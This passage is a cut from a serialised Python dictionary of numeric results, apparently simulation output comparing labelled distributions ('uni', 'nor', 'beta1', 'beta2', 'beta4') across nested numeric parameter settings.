0.8429049932670651}, 30: {'uni': 0.8473840494179985, 'nor': 0.8593935913424329, 'beta1': 0.8549015071344843, 'beta2': 0.9488767154018491, 'beta4': 0.8370179764634424}, 20: {'uni': 0.8404817022893748, 'nor': 0.877865137025845, 'beta1': 0.8739655207876006, 'beta2': 0.928251728118239, 'beta4': 0.8381578990306405}, 10: {'uni': 0.848709588465607, 'nor': 0.8389582119738962, 'beta1': 0.8048592485731447, 'beta2': 0.8735632432997815, 'beta4': 0.8077397160130388}}, 500: {1000: {'uni': 0.8869990124500643, 'nor': 2.3926471716005158, 'beta1': 0.8656755725118289, 'beta2': 6.218693125937045, 'beta4': 0.47295872282949647}, 750: {'uni': 0.8711004704227291, 'nor': 1.9852109566671436, 'beta1': 0.8695174006440114, 'beta2': 4.849215935260051, 'beta4': 0.5053262520867102}, 500: {'uni': 0.8798487334123686, 'nor': 1.6132673631091394, 'beta1': 0.8630878624950258, 'beta2': 3.5751240393739327, 'beta4': 0.5511306421251556}, 400: {'uni': 0.903491887056683, 'nor': 1.4973046687736005, 'beta1': 0.8929322973576271, 'beta2': 3.0325455273622204, 'beta4': 0.6067709882656296}, 300: {'uni': 0.8670349102220135, 'nor': 1.290326276042757, 'beta1': 0.839686493831913, 'beta2': 2.435890895296174, 'beta4': 0.6075123141293552}, 200: {'uni': 0.8525634185824962, 'nor': 1.2167168133729125, 'beta1': 0.8751305172873307, 'beta2': 1.8939241535011913, 'beta4': 0.6858269415712721}, 150: {'uni': 0.82194800780123, 'nor': 1.0736570375346075, 'beta1': 0.8744521367451882, 'beta2': 1.666617032750535, 'beta4': 0.7183015194836465}, 100: {'uni': 0.8480075940431231, 'nor': 1.005613242317469, 'beta1': 0.9038607200973079, 'beta2': 1.4360275830921037, 'beta4': 0.765583568088014}, 75: {'uni': 0.8379740876341786, 'nor': 1.0190740775977551, 'beta1': 0.8762896090907831, 'beta2': 1.1997858513807305, 'beta4': 0.7991634940817146}, 50: {'uni': 0.8474335678968142, 'nor': 0.966687963122637, 'beta1': 0.8814985864516113, 'beta2': 1.1013494852594226, 'beta4': 0.814899411714437}, 30: {'uni': 0.8727086391467926, 'nor': 0.8921547081202534, 'beta1': 0.8539393755115126, 'beta2': 0.9699137113255722, 'beta4': 0.8265640852509611}, 20: {'uni': 0.8509580839243661, 'nor': 0.8976419303592276, 'beta1': 0.8377850051812428, 'beta2': 0.9490003133987858, 'beta4': 0.822873280879306}, 10: {'uni': 0.8070223792543272, 'nor': 0.8222121101020897, 'beta1': 0.8169261630244183, 'beta2': 0.8687590176135066, 'beta4': 0.8358281226159047}}, 400: {1000: {'uni': 0.8322925059461799, 'nor': 2.772959248898575, 'beta1': 0.8893671382511937, 'beta2': 6.069963280541391, 'beta4': 0.4477691999805573}, 750: {'uni': 0.8613686583710596, 'nor': 2.2314767356879326, 'beta1': 0.8568956660509862, 'beta2': 4.854992785999708, 'beta4': 0.4832858323318025}, 500: {'uni': 0.8567699511619379, 'nor': 1.8200600461414693, 'beta1': 0.9080785163321283, 'beta2': 3.4157894226102203, 'beta4': 0.551367596609852}, 400: {'uni': 0.8369044265082584, 'nor': 1.5845080295693856, 'beta1': 0.8500625111572069, 'beta2': 2.9594155017882446, 'beta4': 0.5474817232894605}, 300: {'uni': 0.8687488891518946, 'nor': 1.4620428679624027, 'beta1': 0.8877443382363509, 'beta2': 2.481100386426921, 'beta4': 0.5937679151105709}, 200: {'uni': 0.8268590674018326, 'nor': 1.2437500818930782, 'beta1': 0.8799053584315863, 'beta2': 1.9723014293020296, 'beta4': 0.6786183666437543}, 150: {'uni': 0.8589374510858506, 'nor': 1.1816870309605243, 'beta1': 0.8718362510385768, 'beta2': 1.6860574439544969, 'beta4': 0.7224050217211732}, 100: {'uni': 0.8637240017119076, 'nor': 1.0352677456743422, 'beta1': 0.8417017245035276, 'beta2': 1.409613185720384, 'beta4': 0.7405058894550209}, 75: {'uni': 0.8637532375150383, 'nor': 0.9779373487935997, 'beta1': 0.8781013460358983, 'beta2': 1.237799529212922, 'beta4': 0.763051811457541}, 50: {'uni': 0.8469820141871477, 'nor': 0.9527738404825348, 'beta1': 0.854958580126025, 'beta2': 1.1302429451594769, 'beta4': 0.8011092866946141}, 30: {'uni': 0.8736551317015678, 'nor': 0.8951809427802495, 'beta1': 0.8825847779488676, 'beta2': 0.976513604820869, 'beta4': 0.8236922508203844}, 20: {'uni': 0.8445914174745024, 'nor': 0.8978427140297524, 'beta1': 0.8285384005464761, 'beta2': 0.9441752062117178, 'beta4': 0.8079416993063016}, 10: {'uni': 0.8059582553072695, 'nor': 0.8422271125818357, 'beta1': 0.822948579547678, 'beta2': 0.8530417818519627, 'beta4': 0.7908692241190146}}, 300: {1000: {'uni': 0.85015130833887, 'nor': 3.434760468098905, 'beta1': 0.8571894410585443, 'beta2': 6.921244428990534, 'beta4': 0.4092729787000081}, 750: {'uni': 0.862825596472843, 'nor': 2.7875235825000546, 'beta1': 0.8942786992828993, 'beta2': 5.640485944820529, 'beta4': 0.4523328926527227}, 500: {'uni': 0.8612530107937411, 'nor': 2.087138712332073, 'beta1': 0.8499689110732196, 'beta2': 3.9314480214815304, 'beta4': 0.48599991641199985}, 400: {'uni': 0.8719345715637321, 'nor': 1.948459695654461, 'beta1': 0.8535901226550221, 'beta2': 3.376116676834797, 'beta4': 0.5307479361442003}, 300: {'uni': 0.8670545417493539, 'nor': 1.5564108606749094, 'beta1': 0.8498653001731661, 'beta2': 2.8470550015231573, 'beta4': 0.5693301542257994}, 200: {'uni': 0.8668097879968475, 'nor': 1.3376277704327313, 'beta1': 0.8315542163435912, 'beta2': 2.2063579986840036, 'beta4': 0.6039260854671632}, 150: {'uni': 0.8271864622954613, 'nor': 1.2200355388246191, 'beta1': 0.883742467942023, 'beta2': 1.869013842158086, 'beta4': 0.643155393507137}, 100: {'uni': 0.8638972306464799, 'nor': 1.1342641709471044, 'beta1': 0.8598375912189091, 'beta2': 1.5120532688493489, 'beta4': 0.7403717834928402}, 75: {'uni': 0.8583473461451383, 'nor': 1.0800462905879058, 'beta1': 0.8923649808568489, 'beta2': 1.3317255953293965, 'beta4': 0.7345166246898442}, 50: {'uni': 0.8746732518178894, 'nor': 0.9675091473720824, 'beta1': 0.869571585857279, 'beta2': 1.1552038645884999, 'beta4': 0.758415241068141}, 30: {'uni': 0.8799939789005814, 'nor': 0.9517419294376883, 'beta1': 0.8743679176044513, 'beta2': 1.033882047029358, 'beta4': 0.820234969285508}, 20: {'uni': 0.8351927773424345, 'nor': 0.9115728880522416, 'beta1': 0.8661553510614836, 'beta2': 0.9463253532297905, 'beta4': 0.8267082483693564}, 10: {'uni': 0.8406316325477106, 'nor': 0.8314613208194097, 'beta1': 0.8415689332783691, 'beta2': 0.8676067009565547, 'beta4': 0.7923546623661532}}, 200: {1000: {'uni': 0.8857663238193778, 'nor': 4.680179487924737, 'beta1': 0.8596985445949961, 'beta2': 8.640727300137126, 'beta4': 0.3894629855731228}, 750: {'uni': 0.8822609513200822, 'nor': 3.6240629787778325, 'beta1': 0.8509327610699031, 'beta2': 7.06440107867899, 'beta4': 0.4136128719602394}, 500: {'uni': 0.8951511408281749, 'nor': 2.706478161877119, 'beta1': 0.8750179255888083, 'beta2': 4.923212625453092, 'beta4': 0.4438676650195852}, 400: {'uni': 0.8621099039944393, 'nor': 2.3112226100492634, 'beta1': 0.8637393226967995, 'beta2': 4.142311379028304, 'beta4': 0.4989802884758265}, 300: {'uni': 0.8815086783155325, 'nor': 1.973012357083618, 'beta1': 0.8855622176886478, 'beta2': 3.245637925919703, 'beta4': 0.5014064302476238}, 200: {'uni': 0.8328108622368053, 'nor': 1.5986517188378813, 'beta1': 0.8670516338633621, 'beta2': 2.441582595720951, 'beta4': 0.5675354711561659}, 150: {'uni': 0.8509108075288516, 'nor': 1.437846992896105, 'beta1': 0.836851186717404, 'beta2': 1.9740942359159892, 'beta4': 0.613923547729645}, 100: {'uni': 0.8768933007965606, 'nor': 1.2219082590934622, 'beta1': 0.8710445433259488, 'beta2': 1.6652834592979155, 'beta4': 0.6807453974973048}, 75: {'uni': 0.8696669504918266, 'nor': 1.124306793828307, 'beta1': 0.8708924475587642, 'beta2': 1.4585340544518133, 'beta4': 0.6921789139786938}, 50: {'uni': 0.890137756708636, 'nor': 1.0380991897651526, 'beta1': 0.9038916870128674, 'beta2': 1.2617159118800856, 'beta4': 0.737301894421063}, 30: {'uni': 0.8577280992654713, 'nor': 0.9922674847278834, 'beta1': 0.8495021132831815, 'beta2': 1.1148815215500807, 'beta4': 0.7716495960817314}, 20: {'uni': 0.8719153771105802, 'nor': 0.9596683679575053, 'beta1': 0.8591127846243085, 'beta2': 0.9966712227887798, 'beta4': 0.8093952871372214}, 10: {'uni': 0.8302695587113106, 'nor': 0.8708970655099307, 'beta1': 0.823064138178113, 'beta2': 0.8889092964712426, 'beta4': 0.7977767176653532}}, 150: {1000: {'uni': 0.8986138998052507, 'nor': 5.7834675088135725, 'beta1': 0.8490270056828785, 'beta2': 10.407206757701623, 'beta4': 0.3788903299147765}, 750: {'uni': 0.8647457935668315, 'nor': 4.597985491272376, 'beta1': 0.8826314946034581, 'beta2': 7.917017378008792, 'beta4': 0.3939613164237079}, 500: {'uni': 0.8814291871824029, 'nor': 3.2742679017557763, 'beta1': 0.8645904562415648, 'beta2': 5.474819990031853, 'beta4': 0.4201942139903767}, 400: {'uni': 0.8719096515847061, 'nor': 2.8229044013952347, 'beta1': 0.8701785960891302, 'beta2': 4.581611606290644, 'beta4': 0.4331012710758666}, 300: {'uni': 0.8854658111693259, 'nor': 2.34542108556634, 'beta1': 0.8409188898825175, 'beta2': 3.5960889166936094, 'beta4': 0.4756845407835292}, 200: {'uni': 0.8701625486580659, 'nor': 1.8358292727217536, 'beta1': 0.8532097190695673, 'beta2': 2.72141338340365, 'beta4': 0.5228322599770573}, 150: {'uni': 0.8883732054354728, 'nor': 1.6784341004883028, 'beta1': 0.8480800478874988, 'beta2': 2.3548864538236587, 'beta4': 0.5478575722636306}, 100: {'uni': 0.8848899944215347, 'nor': 1.39003511176849, 'beta1': 0.8928556014396124, 'beta2': 1.7581183428124922, 'beta4': 0.6319233921298026}, 75: {'uni': 0.8476576587132466, 'nor': 1.2109186887878762, 'beta1': 0.8549274883770003, 'beta2': 1.5588624857940563, 'beta4': 0.6711749929357153}, 50: {'uni': 0.878992168637968, 'nor': 1.0893345758288648, 'beta1': 0.8571678620038059, 'beta2': 1.2936364210958133, 'beta4': 0.6911762280795586}, 30: {'uni': 0.8386807997491547, 'nor': 0.982291187821282, 'beta1': 0.8808367008354709, 'beta2': 1.0816297459507884, 'beta4': 0.7557102904498407}, 20: {'uni': 0.8307168833220502, 'nor': 0.9767678583343402, 'beta1': 0.8564594109233339, 'beta2': 0.989911410784959, 'beta4': 0.748952291872636}, 10: {'uni': 0.8194083425516434, 'nor': 0.8775832793387287, 'beta1': 0.8471358818316647, 'beta2': 0.8995129578120127, 'beta4': 0.7862318620719233}}, 100: {1000: {'uni': 0.8946637816542238, 'nor': 8.603780168858798, 'beta1': 0.8819450133887767, 'beta2': 12.286473618618768, 'beta4': 0.3681993165409592}, 750: {'uni': 0.9047095939989102, 'nor': 6.544331357001899, 'beta1': 0.8768385993384246, 'beta2': 9.510849254140902, 'beta4': 0.3748657037149706}, 500: {'uni': 0.8828573534389809, 'nor': 4.589167917409369, 'beta1': 0.8687021342851984, 'beta2': 6.4569490799550255, 'beta4': 0.4012132277414978}, 400: {'uni': 0.8816824734545268, 'nor': 3.8702556930171457, 'beta1': 0.868410778897242, 'beta2': 5.358536995714846, 'beta4': 0.39772599926896646}, 300: {'uni': 0.8487402016109327, 'nor': 3.13370246160681, 'beta1': 0.8839192006334508, 'beta2': 4.377387315114399, 'beta4': 0.43260286490656286}, 200: {'uni': 0.8550948483316095, 'nor': 2.2941222796515564, 'beta1': 0.8840654113992507, 'beta2': 3.1793274396848537, 'beta4': 0.4693380740694391}, 150: {'uni': 0.8726854391556464, 'nor': 1.9987190523931557, 'beta1': 0.8640065941351514, 'beta2': 2.4550201259308606, 'beta4': 0.5029338662023729}, 100: {'uni': 0.8744011176190648, 'nor': 1.599629546114851, 'beta1': 0.8758350528124487, 'beta2': 1.8341702678156442, 'beta4': 0.5535398055771565}, 75: {'uni': 0.8816360483295717, 'nor': 1.396209177505365, 'beta1': 0.8588496604966374, 'beta2': 1.7587314717424098, 'beta4': 0.6000984093869451}, 50: {'uni': 0.8444691076907881, 'nor': 1.2083130325494273, 'beta1': 0.8577643593273495, 'beta2': 1.4376280924624785, 'beta4': 0.6608219126680412}, 30: {'uni': 0.8186744117785408, 'nor': 1.070965603891437, 'beta1': 0.8483324727506986, 'beta2': 1.1580907306458454, 'beta4': 0.7234734928182613}, 20: {'uni': 0.8400701531478934, 'nor': 1.000113988644385, 'beta1': 0.8321822290696924, 'beta2': 1.0710298849251567, 'beta4': 0.7339870282448464}, 10: {'uni': 0.8382328001002571, 'nor': 0.9092521075722466, 'beta1': 0.8359072328233461, 'beta2': 0.9120018345512748, 'beta4': 0.7663868495863666}}, 75: {1000: {'uni': 0.9392011817188017, 'nor': 10.904728772367289, 'beta1': 0.866624607543039, 'beta2': 13.539885930108083, 'beta4': 0.3534109865942192}, 750: {'uni': 0.9355897301990589, 'nor': 8.230208100553527, 'beta1': 0.8573793409512389, 'beta2': 10.554777001721034, 'beta4': 0.3707815481206261}, 500: {'uni': 0.902737130958842, 'nor': 5.9005448659039414, 'beta1': 0.9039620810225308, 'beta2': 7.009224078205305, 'beta4': 0.37752549840973754}, 400: {'uni': 0.8820840867138475, 'nor': 4.906683628702614, 'beta1': 0.8471201075727584, 'beta2': 5.811385171318147, 'beta4': 0.37395562054497417}, 300: {'uni': 0.8905762412970645, 'nor': 3.8692194969852842, 'beta1': 0.9120410272155509, 'beta2': 4.664194484656855, 'beta4': 0.4126825810690872}, 200: {'uni': 0.8389878062923508, 'nor': 2.8755206530986688, 'beta1': 0.8502879253313526, 'beta2': 3.3092550616564202, 'beta4': 0.42921847952639935}, 150: {'uni': 0.8439913453823732, 'nor': 2.2602699891688856, 'beta1': 0.8817858849869306, 'beta2': 2.6797847545171676, 'beta4': 0.47138132435008684}, 100: {'uni': 0.8589328530157215, 'nor': 1.8035701933261568, 'beta1': 0.8723921800108287, 'beta2': 1.9841585248871425, 'beta4': 0.5132672551619654}, 75: {'uni': 0.8494008654992535, 'nor': 1.6071498176774344, 'beta1': 0.8921558615811434, 'beta2': 1.7948054307860677, 'beta4': 0.5600945143875852}, 50: {'uni': 0.8459905263294217, 'nor': 1.3456446878132973, 'beta1': 0.8360437432777298, 'beta2': 1.4098100528261963, 'beta4': 0.5995871991066353}, 30: {'uni': 0.863255907688344, 'nor': 1.163832926785131, 'beta1': 0.8610017576182266, 'beta2': 1.2221297578160732, 'beta4': 0.6852793799758119}, 20: {'uni': 0.8208301547311144, 'nor': 1.0466688062181275, 'beta1': 0.8659319938555088, 'beta2': 1.0233244108524449, 'beta4': 0.7240872799802124}, 10: {'uni': 0.8032328211939312, 'nor': 0.9417402156036838, 'beta1': 0.8526278553950033, 'beta2': 0.9217056736337736, 'beta4': 0.7718520630849283}}, 50: {1000: {'uni': 1.0415495975920712, 'nor': 16.265730359177034, 'beta1': 0.8877957838662055, 'beta2': 16.885442852467367, 'beta4': 0.3448739500232382}, 750: {'uni': 1.0098033949308896, 'nor': 12.258570778017333, 'beta1': 0.8706995791907859, 'beta2': 12.395166093820881, 'beta4': 0.35315381524036327}, 500: {'uni': 0.9415139858342592, 'nor': 8.481807472429985, 'beta1': 0.8972503865903044, 'beta2': 8.392611665283725, 'beta4': 0.36998606207623813}, 400: {'uni': 0.9115614150434282, 'nor': 6.710526205260556, 'beta1': 0.8363890434236055, 'beta2': 6.893481197785906, 'beta4': 0.35909227964437845}, 300: {'uni': 0.8787877860539303, 'nor': 5.174832246974513, 'beta1': 0.8566295227226275, 'beta2': 5.494166649585702, 'beta4': 0.3906665116470583}, 200: {'uni': 0.868109213219911, 'nor': 3.8785570981039923, 'beta1': 0.8486507394057397, 'beta2': 3.967316649529905, 'beta4': 0.4099010863230901}, 150: {'uni': 0.8521655040528395, 'nor': 3.089208594179127, 'beta1': 0.86485525155687, 'beta2': 3.1562227864035775, 'beta4': 0.4259916065124458}, 100: {'uni': 0.8538795335041026, 'nor': 2.345951444856802, 'beta1': 0.8576683025117604, 'beta2': 2.34371617917428, 'beta4': 0.47209240963168714}, 75: {'uni': 0.8518076855463557, 'nor': 2.004537103880557, 'beta1': 0.8924709495111173, 'beta2': 1.943645059238237, 'beta4': 0.5024138107270238}, 50: {'uni': 0.8529988890643148, 'nor': 1.637600402682281, 'beta1': 0.887282270801599, 'beta2': 1.5942525719928833, 'beta4': 0.5461737896321196}, 30: {'uni': 0.8317247039979097, 'nor': 1.2728847122349543, 'beta1': 0.8763974125117077, 'beta2': 1.2510718185241683, 'beta4': 0.6168812853181134}, 20: {'uni': 0.8288102680813932, 'nor': 1.127591734617398, 'beta1': 0.8484767896870734, 'beta2': 1.0683362295171508, 'beta4': 0.6634916799393047}, 10: {'uni': 0.8176133987807528, 'nor': 0.962361595088012, 'beta1': 0.8463373485431211, 'beta2': 0.9792459537116653, 'beta4': 0.7132996896249393}}, 30: {1000: {'uni': 1.2696860283761329, 'nor': 27.028546181049798, 'beta1': 0.8886841713466621, 'beta2': 21.836331871174327, 'beta4': 0.34885048965467425}, 750: {'uni': 1.1759720018152577, 'nor': 20.606898542988638, 'beta1': 0.8823359568565259, 'beta2': 16.492206692516675, 'beta4': 0.3456789491663497}, 500: {'uni': 1.0607922271898333, 'nor': 13.499694108821545, 'beta1': 0.8704093259926938, 'beta2': 10.840977904557175, 'beta4': 0.3586589082724464}, 400: {'uni': 1.034149292980726, 'nor': 10.918561084901162, 'beta1': 0.8744363285476298, 'beta2': 8.989655953402785, 'beta4': 0.35894729709119183}, 300: {'uni': 0.9693906483358444, 'nor': 8.511512725546728, 'beta1': 0.8913582403756317, 'beta2': 6.734747049938925, 'beta4': 0.3571048621894059}, 200: {'uni': 0.9295062768532519, 'nor': 5.726145369760396, 'beta1': 0.8464608450876929, 'beta2': 4.740491290627747, 'beta4': 0.3753071091113352}, 150: {'uni': 0.8911914980160859, 'nor': 4.786527437358327, 'beta1': 0.9029710546460754, 'beta2': 3.627949786933054, 'beta4': 0.3868813723011823}, 100: {'uni': 0.8741205713557936, 'nor': 3.3912944344384437, 'beta1': 0.8420955501315833, 'beta2': 2.740025646984923, 'beta4': 0.42282517623248606}, 75: {'uni': 0.8417413679465983, 'nor': 2.770535795664202, 'beta1': 0.8689267525581056, 'beta2': 2.3351824154600016, 'beta4': 0.4355723263901833}, 50: {'uni': 0.8293019485037857, 'nor': 2.1331783667990547, 'beta1': 0.8636890393573666, 'beta2': 1.795449942087839, 'beta4': 0.47663699780502283}, 30: {'uni': 0.8398719438451165, 'nor': 1.5873110864904567, 'beta1': 0.8458052978100878, 'beta2': 1.3157854252669225, 'beta4': 0.542696670833237}, 20: {'uni': 0.8588110918111577, 'nor': 1.370992161006879, 'beta1': 0.8127388456820281, 'beta2': 1.2066500169529317, 'beta4': 0.6136617948645082}, 10: {'uni': 0.8082099171087873, 'nor': 1.122302969663073, 'beta1': 0.7984881402335584, 'beta2': 0.9808222408488511, 'beta4': 0.7086263964034699}}, 20: {1000: {'uni': 1.7845594214279576, 'nor': 40.15832565029172, 'beta1': 0.950259894237407, 'beta2': 25.861562337744196, 'beta4': 0.32973420092003286}, 750: {'uni': 1.5897522441647864, 'nor': 28.315155657619325, 'beta1': 0.913891705486057, 'beta2': 20.117293413810955, 'beta4': 0.34329017661554695}, 500: {'uni': 1.3030580424170426, 'nor': 20.253228491861286, 'beta1': 0.9220502576370694, 'beta2': 13.583692929451516, 'beta4': 0.35295824845181184}, 400: {'uni': 1.2511593986123553, 'nor': 16.721863866209368, 'beta1': 0.8890682031702455, 'beta2': 11.11481009070622, 'beta4': 0.3504685746126408}, 300: {'uni': 1.1556472143034846, 'nor': 12.530843145240851, 'beta1': 0.8995531892253813, 'beta2': 8.478893847650728, 'beta4': 0.34635706601890454}, 200: {'uni': 1.002551669149528, 'nor': 8.576294654093017, 'beta1': 0.8723105746829944, 'beta2': 5.853099794656523, 'beta4': 0.36846801010142255}, 150: {'uni': 0.9694379710633484, 'nor': 6.690519847813086, 'beta1': 0.8717961407072875, 'beta2': 4.597201584965225, 'beta4': 0.3659628260777635}, 100: {'uni': 0.8977854726841326, 'nor': 4.692828531090058, 'beta1': 0.8496010281273996, 'beta2': 3.1550068582035578, 'beta4': 0.38511701524257447}, 75: {'uni': 0.9118678625047828, 'nor': 3.7324572320229095, 'beta1': 0.8652199493328219, 'beta2': 2.529492997234143, 'beta4': 0.40778432043338764}, 50: {'uni': 0.8543398305647835, 'nor': 2.876515939258069, 'beta1': 0.83415119798805, 'beta2': 1.978057747859159, 'beta4': 0.4411959818288761}, 30: {'uni': 0.8433281461496579, 'nor': 1.9748223737762594, 'beta1': 0.8359570278817351, 'beta2': 1.463749824817638, 'beta4': 0.4833063970512745}, 20: {'uni': 0.8332039379907832, 'nor': 1.5857551546674844, 'beta1': 0.8245999245393716, 'beta2': 1.2217108424486114, 'beta4': 0.5416079971879648}, 10: {'uni': 0.767644168526127, 'nor': 1.186352156756191, 'beta1': 0.8038565208106804, 'beta2': 0.9942753593007874, 'beta4': 0.631678251643074}}, 10: {1000: {'uni': 3.753193315878337, 'nor': 80.54961219964801, 'beta1': 1.4544532440986977, 'beta2': 37.457752389369944, 'beta4': 0.33787557256732886}, 750: {'uni': 3.13190540427256, 'nor': 61.39195913384035, 'beta1': 1.2853163542779982, 'beta2': 28.219925280709226, 'beta4': 0.3438604922632593}, 500: {'uni': 2.361928334320761, 'nor': 39.264786613414124, 'beta1': 1.0987827263867904, 'beta2': 19.44333576209149, 'beta4': 0.34485169875041716}, 400: {'uni': 2.0476194993736376, 'nor': 32.94817315559009, 'beta1': 1.0488861998480152, 'beta2': 15.54348581454614, 'beta4': 0.33462832934226017}, 300: {'uni': 1.7346022453973275, 'nor': 24.123522158092758, 'beta1': 0.9961117172285985, 'beta2': 11.539236263935074, 'beta4': 0.3497737633950961}, 200: {'uni': 1.4525939834033061, 'nor': 16.34875245088017, 'beta1': 0.9253876022802889, 'beta2': 8.020657570999116, 'beta4': 0.34879974403231523}, 150: {'uni': 1.298454489895215, 'nor': 12.039103036503901, 'beta1': 0.8983179227349697, 'beta2': 6.1480857184206545, 'beta4': 0.3515031726202898}, 100: {'uni': 1.149106274875983, 'nor': 8.792370330870405, 'beta1': 0.8859050703287877, 'beta2': 4.127419446528227, 'beta4': 0.37328300271926307}, 75: {'uni': 1.0510563523184537, 'nor': 6.690824582353118, 'beta1': 0.8676483571212735, 'beta2': 3.261862421040156, 'beta4': 0.35955743890308756}, 50: {'uni': 0.944355604551499, 'nor': 4.8498605482734485, 'beta1': 0.856890203472039, 'beta2': 2.40472627933374, 'beta4': 0.3740413835304806}, 30: {'uni': 0.856343008929495, 'nor': 3.122509717131945, 'beta1': 0.7969111331070415, 'beta2': 1.6917780539337604, 'beta4': 0.420410921911824}, 20: {'uni': 0.8184308142900829, 'nor': 2.404727094095177, 'beta1': 0.8086310697032824, 'beta2': 1.4107687480292843, 'beta4': 0.44807980574077305}, 10: {'uni': 0.7832503930172614, 'nor': 1.5626869225976665, 'beta1': 0.7853435742092469, 'beta2': 1.0642285862729415, 'beta4': 0.5256048778718274}}}, 0.01: {1000: {1000: {'uni': 0.7219503597168808, 'nor': 1.3522899382499511, 'beta1': 0.7503888090005709, 'beta2': 4.359712279210015, 'beta4': 0.47805541074462554}, 750: {'uni': 0.7460653360509083, 'nor': 1.2215802732877805, 'beta1': 0.7579034372202724, 'beta2': 3.44439122365882, 'beta4': 0.5013760660613135}, 500: {'uni': 0.7457104709224507, 'nor': 1.0274833085776511, 'beta1': 0.7356416860323749, 'beta2': 2.379942654242188, 'beta4': 0.5628465543348214}, 400: {'uni': 0.7540793490028289, 'nor': 0.9939475957798122, 'beta1': 0.7677563353825323, 'beta2': 2.085462426476235, 'beta4': 0.5902860977216214}, 300: {'uni': 0.7416999961068458, 'nor': 0.9093968404709234, 'beta1': 0.7454049674434894, 'beta2': 1.707950964614366, 'beta4': 0.6001696878842937}, 200: {'uni': 0.7524857828756578, 'nor': 0.890322894897767, 'beta1': 0.7254202434608807, 'beta2': 1.3850934656667797, 'beta4': 0.6253567875211119}, 150: {'uni': 0.7464000130882479, 'nor': 0.82772600390256, 'beta1': 0.748717836598423, 'beta2': 1.2348711064861624, 'beta4': 0.6676094543272186}, 100: {'uni': 0.7406116313995137, 'nor': 0.7846559695042307, 'beta1': 0.7436305573461189, 'beta2': 1.058180498214777, 'beta4': 0.6960649268744108}, 75: {'uni': 0.7336661138941689, 'nor': 0.7752977113565671, 'beta1': 0.7119633999030476, 'beta2': 0.9638602094125377, 'beta4': 0.7106380565315166}, 50: {'uni': 0.7274345032232149, 'nor': 0.7769370576160674, 'beta1': 0.7283032566959488, 'beta2': 0.9082889542215573, 'beta4': 0.7042713454877574}, 30: {'uni': 0.71539271539834, 'nor': 0.7636883535575116, 'beta1': 0.7265786350524956, 'beta2': 0.8451376503815184, 'beta4': 0.7172879038073893}, 20: {'uni': 0.7278822712528917, 'nor': 0.7329383859926495, 'beta1': 0.7426269815726088, 'beta2': 0.7846227593442195, 'beta4': 0.7144990540387691}, 10: {'uni': 0.7131138660193919, 'nor': 0.7161480646534595, 'beta1': 0.6990538369629343, 'beta2': 0.7376189274957015, 'beta4': 0.7088112725925363}}, 750: {1000: {'uni': 0.7514448328173757, 'nor': 1.5690434935428623, 'beta1': 0.7238769915288217, 'beta2': 4.38682423614769, 'beta4': 0.4524323542299279}, 750: {'uni': 0.7455825696325514, 'nor': 1.3328601960899922, 'beta1': 0.7438570163136006, 'beta2': 3.355424284560506, 'beta4': 0.4758585436464304}, 500: {'uni': 0.7330809665950883, 'nor': 1.135828118704559, 'beta1': 0.7459578036681647, 'beta2': 2.338558656779778, 'beta4': 0.543469912113142}, 400: {'uni': 0.7393601770653746, 'nor': 1.052047627034842, 'beta1': 0.7600197916673754, 'beta2': 2.1262388399145316, 'beta4': 0.5680920375709674}, 300: {'uni': 0.733890553738948, 'nor': 0.9951567989849669, 'beta1': 0.7491899564747048, 'beta2': 1.7142789768265858, 'beta4': 0.5873317180036289}, 200: {'uni': 0.7173225588019696, 'nor': 0.9241399821663433, 'beta1': 0.7167646128108208, 'beta2': 1.398836761053942, 'beta4': 0.6156346475851152}, 150: {'uni': 0.7552102082425654, 'nor': 0.8640953826991624, 'beta1': 0.770371701027368, 'beta2': 1.2233959927790403, 'beta4': 0.6696303297293811}, 100: {'uni': 0.7586001636448041, 'nor': 0.8265445942127733, 'beta1': 0.7298586370318658, 'beta2': 1.0788951673020957, 'beta4': 0.6819565674039529}, 75: {'uni': 0.7339719193619441, 'nor': 0.7970213915919653, 'beta1': 0.7452981007326952, 'beta2': 0.9902033388465475, 'beta4': 0.6806705721923305}, 50: {'uni': 0.7426285460991999, 'nor': 0.784823983472302, 'beta1': 0.7328375072176379, 'beta2': 0.8989778928787314, 'beta4': 0.714999119165653}, 30: {'uni': 0.7540507423640944, 'nor': 0.7582186672393878, 'beta1': 0.7339734090546394, 'beta2': 0.8529443603173799, 'beta4': 0.7059507241941045}, 20: {'uni': 0.7201249000817622, 'nor': 0.7617493220181438, 'beta1': 0.7349074815395348, 'beta2': 0.7881594314228356, 'beta4': 0.7196526975796932}, 10: {'uni': 0.7153409619896742, 'nor': 0.7224788626089845, 'beta1': 0.7017555851627001, 'beta2': 0.7359482321541709, 'beta4': 0.685808672984458}}, 500: {1000: {'uni': 0.7380604623841498, 'nor': 2.0074921408234596, 'beta1': 0.7259149617361781, 'beta2': 5.1534725835867174, 'beta4': 0.4016185019025364}, 750: {'uni': 0.7277313960695746, 'nor': 1.6968624841848041, 'beta1': 0.7395120438274015, 'beta2': 4.0638408872213905, 'beta4': 0.4252262089873473}, 500: {'uni': 0.7495634259353762, 'nor': 1.3803020407947926, 'beta1': 0.7247647863955615, 'beta2': 2.95719376036709, 'beta4': 0.48637810148569965}, 400: {'uni': 0.7497722433163603, 'nor': 1.2589603075934335, 'beta1': 0.7439095820905751, 'beta2': 2.474926128760821, 'beta4': 0.49292747162383926}, 300: {'uni': 0.722253811511448, 'nor': 1.1061656778845381, 'beta1': 0.7387074468238296, 'beta2': 2.040531745372352, 'beta4': 0.5439583012238866}, 200: {'uni': 0.7419144634436707, 'nor': 0.9866019092605993, 'beta1': 0.7485409246569181, 'beta2': 1.6217964319106442, 'beta4': 0.5938407647627634}, 150: {'uni': 0.7507584514333536, 'nor': 0.9112256273611522, 'beta1': 0.7583144421101103, 'beta2': 1.4136429869481633, 'beta4': 0.6219493991981659}, 100: {'uni': 0.7483473641741184, 'nor': 0.8696982703928622, 'beta1': 0.7458470511513203, 'beta2': 1.1900733793640232, 'beta4': 0.6404674789644428}, 75: {'uni': 0.7581297777885967, 'nor': 0.8098297138565111, 'beta1': 0.74147568796388, 'beta2': 1.036728255630718, 'beta4': 0.6638886698880033}, 50: {'uni': 0.7277428656725512, 'nor': 0.8328795823416434, 'beta1': 0.7504227439834543, 'beta2': 0.9543372753583443, 'beta4': 0.6832013312974475}, 30: {'uni': 0.7544258542081878, 'nor': 0.768097419973158, 'beta1': 0.7167797119759898, 'beta2': 0.8583509524300639, 'beta4': 0.6852309446092829}, 20: {'uni': 0.7254031250497417, 'nor': 0.7362340759894164, 'beta1': 0.7389112075834917, 'beta2': 0.8164314073450918, 'beta4': 0.7063892945802895}, 10: {'uni': 0.6955262901599432, 'nor': 0.7142489442262036, 'beta1': 